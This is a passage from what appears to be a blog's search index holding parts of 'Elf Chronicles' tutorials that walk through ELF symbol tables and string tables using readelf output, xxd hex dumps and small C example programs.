(Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x143 [ 5 ] Name: printf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 6 ] Name: __isoc99_scanf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 7 ] Name: addFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 8 ] Name: subFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 9 ] Name: mulFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 10 ] Name: divFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 11 ] Name: puts Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 12 ] Name: __stack_chk_fail Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 In this case, things get a bit more interesting. Let\u0026rsquo;s begin with the same set of symbols: addFunc, subFunc, mulFunc, and divFunc.\nYou\u0026rsquo;ll notice that these symbols are global, but they don\u0026rsquo;t have any associated types. This is expected since the symbols are not defined in this file; they are just being called. At this stage, we\u0026rsquo;re not certain if there\u0026rsquo;s anything like these symbols elsewhere, which is why all the other members are zeroed out (undefined). This essentially instructs the magical linker to locate the values of these symbols (linkers are pretty good at this; they will give errors if the symbols aren\u0026rsquo;t found).\nNow, you\u0026rsquo;ll also notice the presence of printf and puts symbols. This may raise a question: \u0026ldquo;I didn\u0026rsquo;t use puts in my code, so why is it there?\u0026rdquo;\nAnswer: It\u0026rsquo;s compiler magic! The compiler observed that the line printf(\u0026quot;Enter equation (9 * 6): \u0026quot;); could be expressed as puts(\u0026quot;Enter equation (9 * 6): \u0026quot;);, so it made this conversion during compilation. To confirm this, you can generate the compiled code using gcc -S and check the call to puts function.\nNow, let\u0026rsquo;s examine our mighty main symbol. The st_info indicates that it\u0026rsquo;s a GLOBAL function (with bind=0x1 and type=0x2). This function is located in the 1st section (sh_shndx: 0x1) of main.o, which in our case is the .text section. The function begins at offset 0x0, and its size is 0x143. Pretty simple, right?\n(Note: I\u0026rsquo;m leaving __isoc99_scanf and __stack_chk_fail for you. Google them!)\n3. calc This represents the ultimate outcome of the entire compilation, assembly, and linking process \u0026ndash; the final ELF executable binary. However, the process to obtain its symbol table remains same.\nHere is the symtab for this ELF binary\n[ 27 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x3050 Size: 768 Link: 28 Info: 0x7 Addralign: 0x8 Entsize: 24 [ 0 ] Name: Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 1 ] Name: main.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 2 ] Name: libarithmatic.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 3 ] Name: Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 4 ] Name: _DYNAMIC Info: 0x01 (Bind: 0x0 | Type: 0x1) Other: 0x0 Shndx: 0x15 Value: 0x000000003de0 Size: 0x0 [ 5 ] Name: __GNU_EH_FRAME_HDR Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x11 Value: 0x000000002048 Size: 0x0 [ 6 ] Name: _GLOBAL_OFFSET_TABLE_ Info: 0x01 (Bind: 0x0 | Type: 0x1) Other: 0x0 Shndx: 0x17 Value: 0x000000003fe8 Size: 0x0 [ 7 ] Name: __libc_start_main@GLIBC_2.34 Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 8 ] Name: _ITM_deregisterTMCloneTable Info: 0x32 (Bind: 0x2 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 9 ] Name: data_start Info: 0x32 (Bind: 0x2 | Type: 0x0) Other: 0x0 Shndx: 0x18 Value: 0x000000004020 Size: 0x0 [ 10 ] Name: subFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012c6 Size: 0x1a [ 11 ] Name: puts@GLIBC_2.2.5 Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 12 ] Name: _edata Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x18 Value: 0x000000004030 Size: 0x0 [ 13 ] Name: _fini Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x2 Shndx: 0xf Value: 0x000000001330 Size: 0x0 [ 14 ] Name: __stack_chk_fail@GLIBC_2.4 Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 15 ] Name: printf@GLIBC_2.2.5 Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 16 ] Name: addFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012ac Size: 0x1a [ 17 ] Name: __data_start Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x18 Value: 0x000000004020 Size: 0x0 [ 18 ] Name: __gmon_start__ Info: 0x32 (Bind: 0x2 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 19 ] Name: __dso_handle Info: 0x17 (Bind: 0x1 | Type: 0x1) Other: 0x2 Shndx: 0x18 Value: 0x000000004028 Size: 0x0 [ 20 ] Name: _IO_stdin_used Info: 0x17 (Bind: 0x1 | Type: 0x1) Other: 0x0 Shndx: 0x10 Value: 0x000000002000 Size: 0x4 [ 21 ] Name: divFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012fa Size: 0x34 [ 22 ] Name: _end Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x19 Value: 0x000000004038 Size: 0x0 [ 23 ] Name: _start Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x000000001070 Size: 0x26 [ 24 ] Name: __bss_start Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x19 Value: 0x000000004030 Size: 0x0 [ 25 ] Name: mulFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012e0 Size: 0x1a [ 26 ] Name: main Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x000000001169 Size: 0x143 [ 27 ] Name: __isoc99_scanf@GLIBC_2.7 Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 28 ] Name: __TMC_END__ Info: 0x17 (Bind: 0x1 | Type: 0x1) Other: 0x2 Shndx: 0x18 Value: 0x000000004030 Size: 0x0 [ 29 ] Name: _ITM_registerTMCloneTable Info: 0x32 (Bind: 0x2 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 30 ] Name: __cxa_finalize@GLIBC_2.2.5 Info: 0x34 (Bind: 0x2 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 31 ] Name: _init Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x2 Shndx: 0xc Value: 0x000000001000 Size: 0x0 The linking process did introduce numerous symbols that exceed the combined count of symbols in both individual object files. To keep things simple (* once again *), we won\u0026rsquo;t dive into the specifics of what these additional symbols do, and we can think of them as a result of linker magic.\nOur primary focus for now remains on the symbols and their properties, even if we don\u0026rsquo;t have detailed knowledge of their functions.\nThese are the symbols we defined ourselves\u0026hellip;\n[ 10 ] Name: subFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012c6 Size: 0x1a [ 16 ] Name: addFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012ac Size: 0x1a [ 21 ] Name: divFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012fa Size: 0x34 [ 25 ] Name: mulFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012e0 Size: 0x1a [ 26 ] Name: main Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x000000001169 Size: 0x143 We can observe the similarities in various members between libarithmatic.o and main.o. The notable difference I can identify is the sh_shndx value, which has changed but still points to the .text section of calc file. The important point is that it should reference the .text section, regardless of the section index value.\nAnother difference is in the st_value. With the addition of numerous new symbols in this file, the positions of these symbols have shifted. Initially, we had the main function in main.o and addFunc in libarithmatic.o, both at offset 0x0. However, when combining them into a single file, one of them had to adjust its offset to make room for the other. This is precisely what occurred here, and there are also other symbols (of function type) that occupied the initial offsets, causing our defined functions to compromise on their offsets.\nOne more intriguing detail is the _start symbol, which has an offset of 0x000000001070. This offset serves as the entry point of our ELF executable binary. You can verify this using readelf or any method you prefer. If you happen to overwrite the entrypoint value in ELF file headers, you\u0026rsquo;ll be calling some other function instead of _start function of glibc. Since _start function performs some startup actions for C runtime environment, so the modified binary may or may not work as intended.\nI\u0026rsquo;m sure that\u0026rsquo;s enough for today, ta-ta!\nhttps://developer.ibm.com/articles/au-aix-symbol-visibility/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://unix.stackexchange.com/questions/472660/what-are-difference-between-the-elf-symbol-visibility-levels\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2023/10/elf-chronicles-symbol-tables/","summary":"\u0026hellip; prologue At this point I hope you have a general idea of how a C program goes through multiple stages/passes and finally an ELF file is generated. Below is a diagram to jog your memory on this\n┌──────────────────┐ │ │ │ hello.c │ // C source │ │ └────────┬─────────┘ │ │ │ /* Compile */ │ │ │ ▼ ┌──────────────────┐ │ │ │ hello.s │ // assembler source │ │ └────────┬─────────┘ │ │ │ /* assemble */ │ │ ▼ ┌──────────────────┐ │ │ │ hello.","title":"Elf Chronicles: Symbol Tables (5/?)"},{"content":"In the article about section headers, you got an introduction to string tables. In this article, we will delve deeper into the topic.\n\u0026hellip;prologue We\u0026rsquo;ll start with the same program we used in the previous article about section headers.\n/* file: hello_world.c */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } Compile this and then analyze the ELF executable file using readelf (Not everytime we\u0026rsquo;ll go with xxd).\n❯ readelf --file-header --wide hello_world ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2\u0026#39;s complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Position-Independent Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x1050 Start of program headers: 64 (bytes into file) Start of section headers: 13608 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 13 Size of section headers: 64 (bytes) Number of section headers: 30 Section header string table index: 29 With the help of this, you can get the section header table of the file.\n#################### Explaination ########################### # # xxd \\ # -s \u0026lt;start_of_section_headers\u0026gt; \\ # Start of section headers: 13608 (bytes into file) # -l \u0026lt;total_size_of_all_section_headers\u0026gt; \\ # size_of_one_section_header(64) * total_count_of_section_headers(30) # -c \u0026lt;bytes_to_print_in_a_single_line\u0026gt; \\ # Just to get a section header entry in a single line # \u0026lt;ELF_file\u0026gt; \\ # ... duhh! # | nl -v0 - # I wanted to get the line numbers starting from 0. WHY 0?? - because that\u0026#39;s where the array indexing starts ############################################################# ❯ xxd \\ -s 13608 \\ -l $(( 64*30 )) \\ -c 64 \\ hello_world \\ | nl -v0 - 0 00003528: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ................................................................ 1 00003568: 1b00 0000 0100 0000 0200 0000 0000 0000 1803 0000 0000 0000 1803 0000 0000 0000 1c00 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 ................................................................ 2 000035a8: 2300 0000 0700 0000 0200 0000 0000 0000 3803 0000 0000 0000 3803 0000 0000 0000 4000 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 #...............8.......8.......@............................... 3 000035e8: 3600 0000 0700 0000 0200 0000 0000 0000 7803 0000 0000 0000 7803 0000 0000 0000 2400 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 6...............x.......x.......$............................... 4 00003628: 4900 0000 0700 0000 0200 0000 0000 0000 9c03 0000 0000 0000 9c03 0000 0000 0000 2000 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 I............................... ............................... 5 00003668: 5700 0000 f6ff ff6f 0200 0000 0000 0000 c003 0000 0000 0000 c003 0000 0000 0000 1c00 0000 0000 0000 0600 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 W......o........................................................ 6 000036a8: 6100 0000 0b00 0000 0200 0000 0000 0000 e003 0000 0000 0000 e003 0000 0000 0000 c000 0000 0000 0000 0700 0000 0100 0000 0800 0000 0000 0000 1800 0000 0000 0000 a............................................................... 7 000036e8: 6900 0000 0300 0000 0200 0000 0000 0000 a004 0000 0000 0000 a004 0000 0000 0000 a800 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 i............................................................... 8 00003728: 7100 0000 ffff ff6f 0200 0000 0000 0000 4805 0000 0000 0000 4805 0000 0000 0000 1000 0000 0000 0000 0600 0000 0000 0000 0200 0000 0000 0000 0200 0000 0000 0000 q......o........H.......H....................................... 9 00003768: 7e00 0000 feff ff6f 0200 0000 0000 0000 5805 0000 0000 0000 5805 0000 0000 0000 4000 0000 0000 0000 0700 0000 0100 0000 0800 0000 0000 0000 0000 0000 0000 0000 ~......o........X.......X.......@............................... 10 000037a8: 8d00 0000 0400 0000 0200 0000 0000 0000 9805 0000 0000 0000 9805 0000 0000 0000 c000 0000 0000 0000 0600 0000 0000 0000 0800 0000 0000 0000 1800 0000 0000 0000 ................................................................ 11 000037e8: 9700 0000 0400 0000 4200 0000 0000 0000 5806 0000 0000 0000 5806 0000 0000 0000 3000 0000 0000 0000 0600 0000 1700 0000 0800 0000 0000 0000 1800 0000 0000 0000 ........B.......X.......X.......0............................... 12 00003828: a100 0000 0100 0000 0600 0000 0000 0000 0010 0000 0000 0000 0010 0000 0000 0000 1b00 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................................................................ 13 00003868: 9c00 0000 0100 0000 0600 0000 0000 0000 2010 0000 0000 0000 2010 0000 0000 0000 3000 0000 0000 0000 0000 0000 0000 0000 1000 0000 0000 0000 1000 0000 0000 0000 ................ ....... .......0............................... 14 000038a8: a700 0000 0100 0000 0600 0000 0000 0000 5010 0000 0000 0000 5010 0000 0000 0000 7101 0000 0000 0000 0000 0000 0000 0000 1000 0000 0000 0000 0000 0000 0000 0000 ................P.......P.......q............................... 15 000038e8: ad00 0000 0100 0000 0600 0000 0000 0000 c411 0000 0000 0000 c411 0000 0000 0000 0d00 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................................................................ 16 00003928: b300 0000 0100 0000 0200 0000 0000 0000 0020 0000 0000 0000 0020 0000 0000 0000 1100 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................. ....... ...................................... 17 00003968: bb00 0000 0100 0000 0200 0000 0000 0000 1420 0000 0000 0000 1420 0000 0000 0000 2400 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................. ....... ......$............................... 18 000039a8: c900 0000 0100 0000 0200 0000 0000 0000 3820 0000 0000 0000 3820 0000 0000 0000 7c00 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 ................8 ......8 ......|............................... 19 000039e8: d300 0000 0e00 0000 0300 0000 0000 0000 d03d 0000 0000 0000 d02d 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................=.......-...................................... 20 00003a28: df00 0000 0f00 0000 0300 0000 0000 0000 d83d 0000 0000 0000 d82d 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................=.......-...................................... 21 00003a68: eb00 0000 0600 0000 0300 0000 0000 0000 e03d 0000 0000 0000 e02d 0000 0000 0000 e001 0000 0000 0000 0700 0000 0000 0000 0800 0000 0000 0000 1000 0000 0000 0000 .................=.......-...................................... 22 00003aa8: f400 0000 0100 0000 0300 0000 0000 0000 c03f 0000 0000 0000 c02f 0000 0000 0000 2800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................?......./......(............................... 23 00003ae8: f900 0000 0100 0000 0300 0000 0000 0000 e83f 0000 0000 0000 e82f 0000 0000 0000 2800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................?......./......(............................... 24 00003b28: 0201 0000 0100 0000 0300 0000 0000 0000 1040 0000 0000 0000 1030 0000 0000 0000 1d00 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 .................@.......0...................................... 25 00003b68: 0801 0000 0800 0000 0300 0000 0000 0000 2d40 0000 0000 0000 2d30 0000 0000 0000 0300 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 ................-@......-0...................................... 26 00003ba8: 0d01 0000 0100 0000 3000 0000 0000 0000 0000 0000 0000 0000 2d30 0000 0000 0000 1b00 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0100 0000 0000 0000 ........0...............-0...................................... 27 00003be8: 0100 0000 0200 0000 0000 0000 0000 0000 0000 0000 0000 0000 4830 0000 0000 0000 7002 0000 0000 0000 1c00 0000 0600 0000 0800 0000 0000 0000 1800 0000 0000 0000 ........................H0......p............................... 28 00003c28: 0900 0000 0300 0000 0000 0000 0000 0000 0000 0000 0000 0000 b832 0000 0000 0000 5301 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 .........................2......S............................... 29 00003c68: 1100 0000 0300 0000 0000 0000 0000 0000 0000 0000 0000 0000 0b34 0000 0000 0000 1601 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 .........................4...................................... Now look back at the readelf output for this line\nSection header string table index: 29 This gives the index for the string table which contains the names of all of the sections\u0026hellip; Remember, sh_name member of section headers did not contained the actual name for the section but a index to section table. This is that section table.\nOn further analyzing this section table entry, we can identify everything about this section.\nindex | offset | sh_name | sh_type | sh_flags | sh_addr | sh_offset | sh_size | sh_link | sh_info | sh_addralign | sh_entsize | 29 | 00003c68: | 1100 0000 | 0300 0000 | 0000 0000 0000 0000 | 0000 0000 0000 0000 | 0b34 0000 0000 0000 | 1601 0000 0000 0000 | 0000 0000 | 0000 0000 | 0100 0000 0000 0000 | 0000 0000 0000 0000 | Right now, interesting thing for us is the data that resides in this section. To get that, we need sh_offset and sh_size. (Keep in mind that these values are in little endian form)\n❯ xxd \\ -s 0x340b \\ # short for 0x000000000000340b (sh_offset) -l 0x116 \\ # short for 0x0000000000000116 (sh_size) hello_world 0000340b: 002e 7379 6d74 6162 002e 7374 7274 6162 ..symtab..strtab 0000341b: 002e 7368 7374 7274 6162 002e 696e 7465 ..shstrtab..inte 0000342b: 7270 002e 6e6f 7465 2e67 6e75 2e70 726f rp..note.gnu.pro 0000343b: 7065 7274 7900 2e6e 6f74 652e 676e 752e perty..note.gnu. 0000344b: 6275 696c 642d 6964 002e 6e6f 7465 2e41 build-id..note.A 0000345b: 4249 2d74 6167 002e 676e 752e 6861 7368 BI-tag..gnu.hash 0000346b: 002e 6479 6e73 796d 002e 6479 6e73 7472 ..dynsym..dynstr 0000347b: 002e 676e 752e 7665 7273 696f 6e00 2e67 ..gnu.version..g 0000348b: 6e75 2e76 6572 7369 6f6e 5f72 002e 7265 nu.version_r..re 0000349b: 6c61 2e64 796e 002e 7265 6c61 2e70 6c74 la.dyn..rela.plt 000034ab: 002e 696e 6974 002e 7465 7874 002e 6669 ..init..text..fi 000034bb: 6e69 002e 726f 6461 7461 002e 6568 5f66 ni..rodata..eh_f 000034cb: 7261 6d65 5f68 6472 002e 6568 5f66 7261 rame_hdr..eh_fra 000034db: 6d65 002e 696e 6974 5f61 7272 6179 002e me..init_array.. 000034eb: 6669 6e69 5f61 7272 6179 002e 6479 6e61 fini_array..dyna 000034fb: 6d69 6300 2e67 6f74 002e 676f 742e 706c mic..got..got.pl 0000350b: 7400 2e64 6174 6100 2e62 7373 002e 636f t..data..bss..co 0000351b: 6d6d 656e 7400 mment. ASCII representation of this section\u0026rsquo;s data chunk confirms that this must be the string table. (the one which contains the names of the sections). Now atleast we know how to walk through the headers and locate a string table section. This gives us a green signal to go deeper and learn more about string tables.\nString table So, here\u0026rsquo;s the deal: when you\u0026rsquo;ve got a bunch of characters, and you end them with a null character, that whole thing is what we call a \u0026ldquo;string.\u0026rdquo; (At least, that\u0026rsquo;s what I\u0026rsquo;ve learned, and I\u0026rsquo;m sticking with it for now.)\nNow, when it comes to a string table, it\u0026rsquo;s pretty simple. It\u0026rsquo;s just a bunch of these strings all lined up, one after the other. The only twist is that the first string is always null (just a null char - \\0 - a null string). Now you can put all that data in a section and create a section header for it with type - SHT_STRTAB(which is just 0x3 in fancy lingo). And voila, you\u0026rsquo;ve got yourself a proper string table, with a section header entry for it.\nIf you want to picture it, think of it like this - a string table is like a list of strings, where the first one is always an empty string.\n## Every 00 is a null char (in hex) # For Section=.shstrtab (Offset: 0x348b, Size: 278 = 0x116 in hex) ❯ xxd -s 0x340b -l 278 hello 0000348b: 002e 7379 6d74 6162 002e 7374 7274 6162 ..symtab..strtab 0000349b: 002e 7368 7374 7274 6162 002e 696e 7465 ..shstrtab..inte 000034ab: 7270 002e 6e6f 7465 2e67 6e75 2e70 726f rp..note.gnu.pro 000034bb: 7065 7274 7900 2e6e 6f74 652e 676e 752e perty..note.gnu. 000034cb: 6275 696c 642d 6964 002e 6e6f 7465 2e41 build-id..note.A 000034db: 4249 2d74 6167 002e 676e 752e 6861 7368 BI-tag..gnu.hash 000034eb: 002e 6479 6e73 796d 002e 6479 6e73 7472 ..dynsym..dynstr 000034fb: 002e 676e 752e 7665 7273 696f 6e00 2e67 ..gnu.version..g 0000350b: 6e75 2e76 6572 7369 6f6e 5f72 002e 7265 nu.version_r..re 0000351b: 6c61 2e64 796e 002e 7265 6c61 2e70 6c74 la.dyn..rela.plt 0000352b: 002e 696e 6974 002e 7465 7874 002e 6669 ..init..text..fi 0000353b: 6e69 002e 726f 6461 7461 002e 6568 5f66 ni..rodata..eh_f 0000354b: 7261 6d65 5f68 6472 002e 6568 5f66 7261 rame_hdr..eh_fra 0000355b: 6d65 002e 696e 6974 5f61 7272 6179 002e me..init_array.. 0000356b: 6669 6e69 5f61 7272 6179 002e 6479 6e61 fini_array..dyna 0000357b: 6d69 6300 2e67 6f74 002e 676f 742e 706c mic..got..got.pl 0000358b: 7400 2e64 6174 6100 2e62 7373 002e 636f t..data..bss..co 0000359b: 6d6d 656e 7400 mment. It should be pretty easy to write a parser for this, if not, ask your friend to do it for you. (hint: not me)\nNow, to proceed, let\u0026rsquo;s take a look at the C program that I\u0026rsquo;ll be using for further examples\n/* file: hello.c */ #include \u0026lt;stdio.h\u0026gt; int global1; char global2 = \u0026#39;x\u0026#39;; static int global3 = 9; static void print_globals(void) { printf(\u0026#34;global1 = %d (%p) | global2 = %c (%p) | global3 = %d (%p)\\n\u0026#34;, global1, \u0026amp;global1, global2, \u0026amp;global2, global3, \u0026amp;global3 ); } int main(){ int local1; char local2 = \u0026#39;y\u0026#39;; static int local3 = 6; printf(\u0026#34;Main: %p\\n\u0026#34;, \u0026amp;main); print_globals(); printf(\u0026#34;local1 = %d (%p) | local2 = %c (%p) | local3 = %d (%p)\\n\u0026#34;, local1, \u0026amp;local1, local2, \u0026amp;local2, local3, \u0026amp;local3 ); return 0; } I assume you can compile it and create the ELF binary. After the ELF binary is ready, analyze it to extract the list of all sections with a type of 0x3 (feeling fancy - SHT_STRTAB). Feel free to use readelf, hexdump, xxd, or any tool you prefer – the output should be same, regardless of your choice.\nUsing my pretty parser, I found three entries.\n[ 07 ] Section Name: .dynstr Type: 0x3 Flags: 0x2 Addr: 0x4a0 Offset: 0x4a0 Size: 170 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 28 ] Section Name: .strtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x3318 Size: 371 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 29 ] Section Name: .shstrtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x348b Size: 278 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 Let\u0026rsquo;s examine them closely, one by one.\nNOTE: String tables consist exclusively of strings. This data doesn\u0026rsquo;t serve much purpose unless those strings are needed by other sections.\n1. .shstrtab This is the string table (the one which stores the names of all of the sections) - well we already talked about it so no point of repeating it, right?\nSo, Why are the section names stored in a separate dedicated section, rather than directly within each section\u0026rsquo;s sh_name member??\nAnswer: While I can\u0026rsquo;t say for certain, it\u0026rsquo;s possible that this design choice was made to accommodate variable-length section names. Storing the names in a separate section allows flexibility in the length of section names and avoids any size constraints related to the sh_name member.\nWhen I parse this with my parser, the data of this section appears like this \u0026ndash; an offset in the section and the string stored at that offset.\n[ 29 ] Section Name: .shstrtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x348b Size: 278 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 0 ] [ 1 ] .symtab [ 9 ] .strtab [ 17 ] .shstrtab [ 27 ] .interp [ 35 ] .note.gnu.property [ 54 ] .note.gnu.build-id [ 73 ] .note.ABI-tag [ 87 ] .gnu.hash [ 97 ] .dynsym [ 105 ] .dynstr [ 113 ] .gnu.version [ 126 ] .gnu.version_r [ 141 ] .rela.dyn [ 151 ] .rela.plt [ 161 ] .init [ 167 ] .text [ 173 ] .fini [ 179 ] .rodata [ 187 ] .eh_frame_hdr [ 201 ] .eh_frame [ 211 ] .init_array [ 223 ] .fini_array [ 235 ] .dynamic [ 244 ] .got [ 249 ] .got.plt [ 258 ] .data [ 264 ] .bss [ 269 ] .comment 2. .strtab This section contains strings (:P), mostly the ones representing names linked to symbol table entries (we\u0026rsquo;ll talk about symbol tables later). But at a quick glance, you can spot some of the names for variables and functions we used in our C program, such as global3, print_globals, main and so on.\nKeep in mind that this section does not hold strings which are used by programs like the ones used with printf function.\n[ 28 ] Section Name: .strtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x3318 Size: 371 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 0 ] [ 1 ] hello.c [ 9 ] global3 [ 17 ] print_globals [ 31 ] local3.0 [ 40 ] _DYNAMIC [ 49 ] __GNU_EH_FRAME_HDR [ 68 ] _GLOBAL_OFFSET_TABLE_ [ 90 ] __libc_start_main@GLIBC_2.34 [ 119 ] _ITM_deregisterTMCloneTable [ 147 ] _edata [ 154 ] _fini [ 160 ] __stack_chk_fail@GLIBC_2.4 [ 187 ] printf@GLIBC_2.2.5 [ 206 ] global1 [ 214 ] __data_start [ 227 ] __gmon_start__ [ 242 ] __dso_handle [ 255 ] _IO_stdin_used [ 270 ] _end [ 275 ] __bss_start [ 287 ] main [ 292 ] __TMC_END__ [ 304 ] _ITM_registerTMCloneTable [ 330 ] __cxa_finalize@GLIBC_2.2.5 [ 357 ] _init [ 363 ] global2 3. .dynstr Similar to strtab, this section contains strings for symbol table entries, but these symbols come into play during runtime, often as part of dynamic linking. Because this section is used for dynamic linking, this needs to be loaded into memory for runtime use. You can confirm that with the sh_flags value for this section (should be 0x2 (or fancy, SHF_ALLOC))\nFor your satisfaction, here is the the output of readelf --segments hello, which indicates that this section is a part of the first LOAD segment\n❯ readelf --segments --wide hello Elf file type is DYN (Position-Independent Executable file) Entry point 0x1050 There are 13 program headers, starting at offset 64 Program Headers: Type Offset VirtAddr PhysAddr 